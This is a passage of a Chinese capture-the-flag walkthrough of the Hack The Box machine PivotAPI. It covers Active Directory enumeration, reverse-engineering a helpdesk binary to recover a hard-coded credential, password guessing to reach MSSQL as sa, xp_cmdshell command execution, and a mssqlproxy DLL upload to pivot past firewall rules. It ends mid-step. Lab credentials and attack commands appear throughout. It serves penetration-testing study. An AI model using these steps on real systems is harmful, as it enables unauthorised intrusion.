ruby-rails-assets-corejs-typeahead/kali-rolling,kali-rolling 1.2.1-3 all
Fast and fully-featured autocomplete search library
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# apt-get install bloodhound.py
在启动该工具之前,使用另外的命令窗口先初始化一下对应数据库:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# neo4j restart
Neo4j is not running.
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:30626). It is available at http://localhost:7474
There may be a short delay until the server is ready.
初始化成功,并且开放了对应的web访问途径,默认的账号密码都是neo4j
,登录后会提示我们修改密码
确保下面的端口可用:
最后回到主窗口执行命令bloodhound
刚开始进去是空白的,这很正常,因为我们还没有导入数据,先退出,利用我们获取到的凭据执行bloodhound采集器采集更多域信息:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# bloodhound-python -c ALL -u kaorz -p Roper4155 -d LicorDebellota.htb -dc LicorDebellota.htb -ns 10.129.228.115 --zip
INFO: Found AD domain: licordebellota.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: LicorDebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: LicorDebellota.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 28 users
INFO: Found 58 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: PivotAPI.LicorDeBellota.htb
INFO: Done in 00M 58S
INFO: Compressing output into 20240128095527_bloodhound.zip
采集到了很多信息,说明这个用户凭据是有效的,最终结果也打包成了.zip
我们导入该压缩包时不需要解压,但是又想预先查看一下里面的文件,可以执行:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# unzip -l 20240128095527_bloodhound.zip
Archive: 20240128095527_bloodhound.zip
Length Date Time Name
--------- ---------- ----- ----
5988 2024-01-28 09:55 20240128095527_gpos.json
69252 2024-01-28 09:55 20240128095527_users.json
27439 2024-01-28 09:55 20240128095527_containers.json
94348 2024-01-28 09:55 20240128095527_groups.json
3164 2024-01-28 09:55 20240128095527_domains.json
4465 2024-01-28 09:56 20240128095527_computers.json
1672 2024-01-28 09:55 20240128095527_ous.json
--------- -------
206328 7 files
然后就可以导入到主程序进行分析,点击右上角的upload data
:
刷新一下数据库就会出现分析到的信息,然后搜索我们获取到的用户并标注已占有:
选择后该用户会出现骷髅头标志,点击该用户查看节点信息,发现该用户没有可以控制的任何目标:
选择analysis
,选择从已占有的主体获取最短路径
后,也没有结果显示,查看其他信息也没有什么可以利用的地方
尝试重新获取smb共享
我们刚开始是通过匿名用户获取smb共享,没有成功,但是现在获取到了一个用户凭据,可以尝试重新利用:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbmap -H $ip1 -u kaorz -p Roper4155
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.129.228.115:445 Name: PivotAPI.LicorDeBellota.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON READ ONLY Recurso compartido del servidor de inicio de sesión
SYSVOL READ ONLY Recurso compartido del servidor de inicio de sesión
# 列出了共享信息,且存在可读的共享目录,尝试访问一下
# 如果`smbmap`没有获取到共享,可以尝试`crackmapexec`等工具
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/IPC$
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> quit
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/NETLOGON
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 8 18:42:28 2020
.. D 0 Sat Aug 8 18:42:28 2020
HelpDesk D 0 Sun Aug 9 23:40:36 2020
5158399 blocks of size 4096. 1027960 blocks available
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
. D 0 Sun Aug 9 23:40:36 2020
.. D 0 Sun Aug 9 23:40:36 2020
Restart-OracleService.exe A 1854976 Fri Feb 19 18:52:01 2021
Server MSSQL.msg A 24576 Sun Aug 9 19:04:14 2020
WinRM Service.msg A 26112 Sun Aug 9 19:42:20 2020
5158399 blocks of size 4096. 1027959 blocks available
smb: \HelpDesk\> prompt off
smb: \HelpDesk\> mget *
parallel_read returned NT_STATUS_IO_TIMEOUT
getting file \HelpDesk\Restart-OracleService.exe of size 1854976 as Restart-OracleService.exe getting file \HelpDesk\Server MSSQL.msg of size 24576 as Server MSSQL.msg (20.8 KiloBytes/sec) (average 20.8 KiloBytes/sec)
getting file \HelpDesk\WinRM Service.msg of size 26112 as WinRM Service.msg (25.9 KiloBytes/sec) (average 23.2 KiloBytes/sec)
smb: \HelpDesk\> quit
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbclient -U LicorDebellota.htb/kaorz //$ip1/SYSVOL
Password for [LICORDEBELLOTA.HTB\kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 8 08:59:02 2020
.. D 0 Sat Aug 8 08:59:02 2020
LicorDeBellota.htb Dr 0 Sat Aug 8 08:59:02 2020
5158399 blocks of size 4096. 1027797 blocks available
smb: \> cd LicorDeBellota.htb\
smb: \LicorDeBellota.htb\> ls
. D 0 Sat Aug 8 09:00:44 2020
.. D 0 Sat Aug 8 09:00:44 2020
DfsrPrivate DHSr 0 Sat Aug 8 09:00:44 2020
Policies D 0 Sat Aug 8 21:45:40 2020
scripts D 0 Sat Aug 8 18:42:28 2020
5158399 blocks of size 4096. 1027797 blocks available
然后依次遍历访问每个目录,下载最有可能看起来是有价值的文件,最终只下载了NETLOGON
中的三个文件:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
20240128095527_bloodhound.zip ftp Kaorz_hash nmapscan pdf_authors pivotapi.pdf Restart-OracleService.exe 'Server MSSQL.msg' users_list 'WinRM Service.msg'
# 如果下载二进制程序失败,可以采用下面的替代方案:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# smbget -U kaorz%Roper4155 smb://10.129.228.115/NETLOGON/HelpDesk/Restart-OracleService.exe
Using domain: WORKGROUP, user: kaorz
[Restart-OracleService.exe] 62.50kB of 1.77MB (3.45%) at 2.98kB/s ETA: 00:09:47
[Restart-OracleService.exe] 562.50kB of 1.77MB (31.05%) at 9.53kB/s ETA: 00:02:115
smb://10.129.228.115/NETLOGON/HelpDesk/Restart-OracleService.exe
Downloaded 1.77MB in 171 seconds
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls -liah
total 17M
4750478 drwxr-xr-x 4 root root 4.0K Jan 28 23:10 .
4729383 drwxr-xr-x 3 root root 4.0K Jan 28 09:59 ..
4763356 -rw-r--r-- 1 root root 203K Jan 28 09:56 20240128095527_bloodhound.zip
5012685 drwxr-xr-x 3 root root 4.0K Jan 15 16:51 ftp
4763218 -rw-r--r-- 1 root root 567 Jan 27 23:31 Kaorz_hash
4870101 drwxr-xr-x 2 root root 4.0K Jan 15 15:36 nmapscan
4729293 -rw-r--r-- 1 root root 35 Jan 27 16:13 pdf_authors
4652927 -rw-r--r-- 1 cvestone cvestone 14M Jan 14 22:32 pivotapi.pdf
4751922 -rwxr-xr-x 1 root root 1.8M Jan 28 23:13 Restart-OracleService.exe
4763357 -rw-r--r-- 1 root root 59K Jan 28 10:37 'Server MSSQL.eml'
4763351 -rw-r--r-- 1 root root 24K Jan 28 10:29 'Server MSSQL.msg'
4728636 -rw-r--r-- 1 root root 79 Jan 27 22:20 users_list
4763358 -rw-r--r-- 1 root root 64K Jan 28 10:37 'WinRM Service.eml'
4763355 -rw-r--r-- 1 root root 26K Jan 28 10:29 'WinRM Service.msg'
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file *.msg
Server MSSQL.msg: CDFV2 Microsoft Outlook Message
WinRM Service.msg: CDFV2 Microsoft Outlook Message
# 这里可以在搜索引擎搜索如何查看Outlook Message,结果显示可以用以下工具进行格式转换
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# msgconvert *.msg
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
20240128095527_bloodhound.zip Kaorz_hash pdf_authors Restart-OracleService.exe 'Server MSSQL.msg' 'WinRM Service.eml'
ftp nmapscan pivotapi.pdf 'Server MSSQL.eml' users_list 'WinRM Service.msg'
# 转换成了`.eml`格式,可以用kali自带的mousepad打开
分析邮件
拿到一封邮件文件,首先一定要注意识别收发人的账户信息
Server MSSQL.eml
:
Date: Sun, 09 Aug 2020 11:04:14 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=17064094600.F3AEBbC1.58748
Content-Transfer-Encoding: 7bit
Subject: Server MSSQL
To: cybervaca@licordebellota.htb <cybervaca@licordebellota.htb>
--17064094600.F3AEBbC1.58748
Content-Type: text/plain; charset=UTF-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Good afternoon,
Due to the problems caused by the Oracle database installed in 2010 in Windows, it has been decided to migrate to MSSQL at the beginning of 2020.
Remember that there were problems at the time of restarting the Oracle service and for this reason a program called "Reset-Service.exe" was created to log in to Oracle and restart the service.
Any doubt do not hesitate to contact us.
Greetings,
The HelpDesk Team
--17064094600.F3AEBbC1.58748
Content-Type: application/rtf
Content-Disposition: inline
Content-Transfer-Encoding: base64
e1xydGYxXGFuc2lcYW5zaWNwZzEyNTJcZnJvbWh0bWwxIFxmYmlkaXMgXGRlZmYwe1xmb250dGJs
Cg17XGYwXGZzd2lzc1xmY2hhcnNldDAgQXJpYWw7fQoNe1xmMVxmbW9kZXJuIENvdXJpZXIgTmV3
O30KDXtcZjJcZm5pbFxmY2hhcnNldDIgU3ltYm9sO30KDXtcZjNcZm1vZGVyblxmY2hhcnNldDAg。。。。。
这封邮件正文中提到由于2010年Oracle
数据库安装导致的问题,2020年决定迁移到MSSQL
,并提到可以用我们获取到的Restart-OracleService.exe
来
登录Oracle
并重启它。说明这是属于运维提醒的邮件,我们要重点记住这类信息。
接下来是WinRM Service.eml
:
Date: Sun, 09 Aug 2020 11:42:20 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=17064094601.94Ba595C.58748
Content-Transfer-Encoding: 7bit
Subject: WinRM Service
To: helpdesk@licordebellota.htb <helpdesk@licordebellota.htb>
--17064094601.94Ba595C.58748
Content-Type: text/plain; charset=UTF-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Good afternoon.
After the last pentest, we have decided to stop externally displaying WinRM's service. Several of our employees are the creators of Evil-WinRM so we do not want to expose this service... We have created a rule to block the exposure of the service and we have also blocked the TCP, UDP and even ICMP output (So that no shells of the type icmp are used.)
Greetings,
The HelpDesk Team
--17064094601.94Ba595C.58748
Content-Type: application/rtf
Content-Disposition: inline
Content-Transfer-Encoding: base64
e1xydGYxXGFuc2lcYW5zaWNwZzEyNTJcZnJvbWh0bWwxIFxmYmlkaXMgXGRlZmYwe1xmb250dGJs。。。。。
邮件正文中提到网络中创建了规则来阻止WinRM服务的暴露,并封锁了TCP, UDP甚至ICMP输出,因此没有imcp类型的shell可以使用。这同样是重要的信息,先记在脑子里。
分析程序1
查看一下该可执行程序的具体类型:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file Restart-OracleService.exe
Restart-OracleService.exe: PE32+ executable (console) x86-64, for MS Windows, 6 sections
是一个amd64的windows扩展可执行程序,还可以看看该程序中的可读字符串,这些都是逆向二进制程序的基本必要分析操作
# 查看有多少行,并写入到单独文件中
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings Restart-OracleService.exe | wc -l
23671
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings Restart-OracleService.exe | tee strings_Restart-Oracle
可以大致浏览一下这个文件,看看是否有一些敏感数据或者关键的逻辑语句可以作为有价值的信息,最终发现:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat strings_Restart-Oracle| grep inf
inflate 1.2.11 Copyright 1995-2017 Mark Adler
可以问chatgpt这是什么意思,chatgpt有时候虽然是不可靠的,但是初始筛查信息可以用,大多时候还是google搜索引擎更靠谱,最终表明这是关于软件或库的版权声明,inflate用来描述数据的解压缩,根据这个信息暂时还是没有什么利用的想法。
再看看动态链接库:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ldd Restart-OracleService.exe
不是动态可执行文件
初步静态分析后,可以用ida或ghidra进行更深入分析,发现即使反编译后很难识别,很难看出比较清晰的程序逻辑,且许多函数都看起来没什么意义,推测该程序被加密或混淆过,静态分析很困难,可以尝试动态分析
监视进程与注册表:
对于初步分析一般使用microsoft的sysinternals
套件,访问下面链接下载:https://learn.microsoft.com/zh-cn/sysinternals/downloads
先用procmon
捕获程序运行时相关的进程以及注册表等信息:
同时先设置筛选,避免太多干扰项:
然后开启捕获模式,同时运行程序,然后清空,重复这个过程,至少3次,看左下角显示相关事件数量是否都差不多,保证程序确实完整运行。
观察过程中,这个程序的行为中出现了很多次像下面的流程:
这显然比起其他的注册表读取系统配置等操作,更让我们感兴趣,因为这是创建了批处理脚本来执行某些命令,并且最后它还销毁了这些批处理文件,这更让人觉得可疑,另外,每次执行程序后,这些批处理文件名字不一样,应该是随机生成的
我们可以进一步筛选,只关注这个批处理脚本
同样可以清空再重新重复该步骤,对比一下是否和上一次行为一样或差不多,这可以保证我们确实捕捉了完整的程序行为:
文件持久化措施:修改目录权限
我们想要知道这个批处理脚本具体做了什么,但是每次程序运行时都会删除它,我们可以通过给Temp
目录修改权限来阻止程序删除该脚本:
先禁用继承
:
然后编辑当前用户的权限,改成如下所示:
文件持久化措施:修改原脚本执行逻辑
首先分析捕获到的bat脚本:
@shift /0
@echo off
if %username% == cybervaca goto correcto
if %username% == frankytech goto correcto
if %username% == ev4si0n goto correcto
goto error
:correcto
echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > c:\programdata\oracle.txt
echo AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g >> c:\programdata\oracle.txt
。。。
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> c:\programdata\oracle.txt
echo $salida = $null; $fichero = (Get-Content C:\ProgramData\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("c:\programdata\restart-service.exe", [System.Convert]::FromBase64String($salida)) > c:\programdata\monta.ps1
powershell.exe -exec bypass -file c:\programdata\monta.ps1
del c:\programdata\monta.ps1
del c:\programdata\oracle.txt
c:\programdata\restart-service.exe
del c:\programdata\restart-service.exe
:error
根据当前登录用户的用户名进行条件判断。如果当前用户名是cybervaca、frankytech或ev4si0n,则跳转到标签:correcto
,否则跳转到标签:error
,其中:correcto
中脚本将一系列像base64加密过的文本输出到文件c:\programdata\oracle.txt
中,然后经过一系列文本处理后将该txt生成新的程序,路径是c:\programdata\restart-service.exe
,最后执行完该程序后,删除。在这里,我们可以稍微修改一下该批处理脚本的逻辑,使其最终能够保留新的程序,便于我们分析:
@shift /0
@echo off
goto correcto
goto error
:correcto
echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > c:\programdata\oracle.txt
echo AAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g >> c:\programdata\oracle.txt
。。。
echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> c:\programdata\oracle.txt
echo $salida = $null; $fichero = (Get-Content C:\ProgramData\oracle.txt) ; foreach ($linea in $fichero) {$salida += $linea }; $salida = $salida.Replace(" ",""); [System.IO.File]::WriteAllBytes("c:\programdata\restart-service.exe", [System.Convert]::FromBase64String($salida)) > c:\programdata\monta.ps1
powershell.exe -exec bypass -file c:\programdata\monta.ps1
:error
然后执行修改后的bat脚本,发现相关的文件也被我们捕获到了:
只有这个新程序是我们感兴趣的,放进kali继续分析:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# file restart-service.exe
restart-service.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, 10 sections
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe | wc -l
10996
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe > restart-service-strings
该程序被剥离了外部 PDB(Program Database)信息,这可能意味着调试信息已被移除,看看strings:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe | wc -l
10996
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe > restart-service-strings
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep user
__setusermatherr
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep -i passw
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# strings restart-service.exe| grep -i kaorz
进一步静态分析看看,和之前遇到的情况一样,也似乎被加密混淆了,难以分析。接下来同样可以先用procmon
动态分析,步骤也和之前一样,但最终仍没有获取到有价值信息。
监视api与传参
上面是从比较宏观的角度监视程序的行为,我们还可以更细致些,尝试去监视程序执行过程中调用的api接口、传递的参数等,看看是否能够获取到敏感信息,对于windows程序可以使用api monitor
工具,下载链接:
http://www.rohitab.com/downloads
注意左边的api模板选中全部,然后创建新的监视进程,选择restart-service.exe
所在路径,由前面获取到的有价值信息中我们了解到目标敏感信息是一个凭据,所以我们可以尝试搜素任何与凭据有关的关键字,看看api调用和参数传递中是否包含这些关键字,很快,我们找到了:
svc_oracle:#oracle_s3rV1c3!2010
显然这是Oracle
的登录凭据,将它单独存放为一个文件
回顾前面的邮件内容中的关键运维事件,由于2010年Oracle
数据库安装导致的问题,2020年迁移到MSSQL
,说明获取到的这个凭据不一定能够成功,但是存在"撞库"的可能性,由于这个密码看起来也有一定的规则性,也有密码爆破、猜测等可能性
可以在bloodhound
看看是否还存在这个用户,或者与其相似的:
查到了另一个用户,是mssql
的,因此我们可以合理猜测mssql
的密码应该也是采用与oracle
相同的规则,除了s3rV1c3!
保持不变,年份(可以发现和邮件中提到的对应上了)和前缀(服务名)都修改成符合获取到关于mssql
的信息,即:
svc_mssql:#mssql_s3rV1c3!2020
查看凭据是否有效:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb $ip1 -u svc_mssql -p '#mssql_s3rV1c3!2020'
SMB 10.129.207.210 445 PIVOTAPI [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
[*] completed: 100.00% (1/1)
SMB 10.129.207.210 445 PIVOTAPI [+] LicorDeBellota.htb\svc_mssql:#mssql_s3rV1c3!2020
显然有效。这并不是巧合,因为很多大型公司中都是有严格的规章制度的,运维设置的密码也有很大可能性是有章法可循的,并且上面的猜测也是基于我们获取到的有价值的信息基础上作出的,最后还做了初步验证
连接mssql获取更多信息
尝试连接mssql:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# mssqlclient.py 'LicorDebellota.htb/svc_mssql:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)>
可以发现,当我们尝试用获取到的凭据第一次连接并没有成功,但是换成mssql
默认用户名登录时成功了,如果依旧没有成功,我们还可以考虑之前.bat
脚本中泄漏出的3个用户名,接下来就可以尝试是否能够开启执行命令选项,从而进行更深入地搜集信息:
SQL (sa dbo@master)> enable_xp_cmdshell
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'show advanced options' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 185: Se ha cambiado la opción de configuración 'xp_cmdshell' de 1 a 1. Ejecute la instrucción RECONFIGURE para instalar.
SQL (sa dbo@master)> xp_cmdshell whoami
output
---------------------------
nt service\mssql$sqlexpress
NULL
SQL (sa dbo@master)>
收集到的系统信息:
SQL (sa dbo@master)> xp_cmdshell systeminfo
output
--------------------------------------------------------------------------------
NULL
Host Name: PIVOTAPI
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/D Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00520-27817-AA848
Original Install Date: 07/08/2020, 23:14:31
System Boot Time: 06/02/2024, 8:39:58
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: es;Spanish (International)
Input Locale: en-us;English (United States)
Time Zone: (UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,888 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,520 MB
Virtual Memory: In Use: 1,279 MB
Page File Location(s): C:\pagefile.sys
Domain: LicorDeBellota.htb
Logon Server: N/A
Hotfix(es): 8 Hotfix(s) Installed.
[01]: KB4601558
[02]: KB4494174
[03]: KB4535680
[04]: KB4558997
[05]: KB4577586
[06]: KB4601393
[07]: KB5001404
[08]: KB5001342
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP Address(es)
[01]: 10.129.207.210
Hyper-V Requirements: A hypervisor was detected. Features required for Hyper-V will not be displayed.
查看当前用户具有哪些权限:
SQL (sa dbo@master)> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------
NULL
PRIVILEGE INFORMATION
--------------------------
NULL
Privilege Name Description State
============================= ================================================ =============
SeAssignPrimaryTokenPrivilege Replace a process-level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to the domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
显然从经验来看,SeImpersonatePrivilege
和SeManageVolumePrivilege
都是和权限提升利用相关的关键权限,可以尝试,但如果是作为域渗透的学习,该优先级可以暂时靠后(因为能直接通过工具提权的可能性)
我们还可以看一下是否还有其他域用户:
SQL (sa dbo@master)> xp_cmdshell net user
output
-------------------------------------------------------------------------------
NULL
User accounts on \\PIVOTAPI
NULL
-------------------------------------------------------------------------------
0xdf 0xVIC 3v4Si0N
Administrador aDoN90 borjmz
cybervaca Dr.Zaiuss Fiiti
FrankyTech Gh0spp7 gibdeon
Invitado ippsec jari
Jharvar Kaorz krbtgt
lothbrok manulqwerty OscarAkaElvis
socketz sshd StooormQ
superfume svc_mssql v1s0r
The command completed successfully.
我们发现了获取到的凭据用户名svc_mssql
,看看关于它的详细信息:
SQL (sa dbo@master)> xp_cmdshell net user svc_mssql /domain
output
-----------------------------------------------------------------------------
Username svc_mssql
Full Name mssql service
Comment
User's comment
Country/region code 000 (Default by the computer)
Account active Yes
Account expires Never
NULL
Last password change 08/08/2020 17:15:22
Password expires Never
Password changeable 09/08/2020 17:15:22
Password required Yes
User may change password No
NULL
Workstations allowed All
Logon script
User profile
Home directory
Last logon 09/08/2020 17:22:26
NULL
Logon hours allowed All
NULL
Local group memberships
Global group memberships *Domain Users
*WinRM
The command completed successfully.
发现这个用户除了在域用户组外还有在WinRM
组,回顾之前的邮件也确实提到了这个服务,我们先看看该服务是否开启了:
SQL (sa dbo@master)> xp_cmdshell netstat -ano | find "5985"
output
------------------------------------------------------------------------
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP [::]:5985 [::]:0 LISTENING 4
开启了并且在监听中,只是没有对外暴露,邮件中还提到创建了一个规则来实现阻止对外暴露并封锁了TCP、UDP甚至ICMP的输出,因此通用的隧道转发等方式都行不通了。但是我们拿到了mssql的默认系统管理员用户,还可以尝试用mssqlproxy
工具,链接:https://github.com/blackarrowsec/mssqlproxy
mssqlproxy 是一个工具包,旨在通过套接字重用,通过受损的 Microsoft SQL Server 在受限环境中执行横向移动。客户端需要 SQL Server 上的 impacket 和 sysadmin 权限。
mssqlproxy绕过封锁规则
但是当我们克隆这个仓库时,发现对应的mssqlclient.py
只适用于python2,但是现在经常使用python3,对于这种情况,我们一般是先搜索看看有没有其他人的解决方案,如果没有找到再凭借自己对安全开发的理解与经验对工具进行修改。在搜索引擎中找到了:
重新克隆这个新的仓库,尝试利用:
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# cp reciclador.dll ../
┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/mssqlproxy]
└─# cd ..
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ls
20240128095527_bloodhound.zip oracle_credential restart-service-strings users_list
api-monitor-v2r13-setup-x64.exe pdf_authors 'Server MSSQL.eml' 'WinRM Service.eml'
ftp pivotapi.pdf 'Server MSSQL.msg' 'WinRM Service.msg'
Kaorz_hash reciclador.dll set_export.sh
mssqlproxy Restart-OracleService.exe strings_Restart-Oracle
nmapscan restart-service.exe systeminfo
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 mssqlproxy/mssqlclient.py 'LicorDebellota.htb/sa:#mssql_s3rV1c3!2020@10.129.207.210'
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> enable_ole
SQL> upload reciclador.dll c:\windows\temp\reciclador.dll
[+] Uploading 'reciclador.dll' to 'c:\windows\temp\reciclador.dll'...
[+] Size is 109056 bytes
[+] Upload completed
SQL> Traceback (most recent call last):
File "/home/cvestone/Desktop/htb/PivotAPI/mssqlproxy/mssqlclient.py", line 547, in <module>
shell.cmdloop()
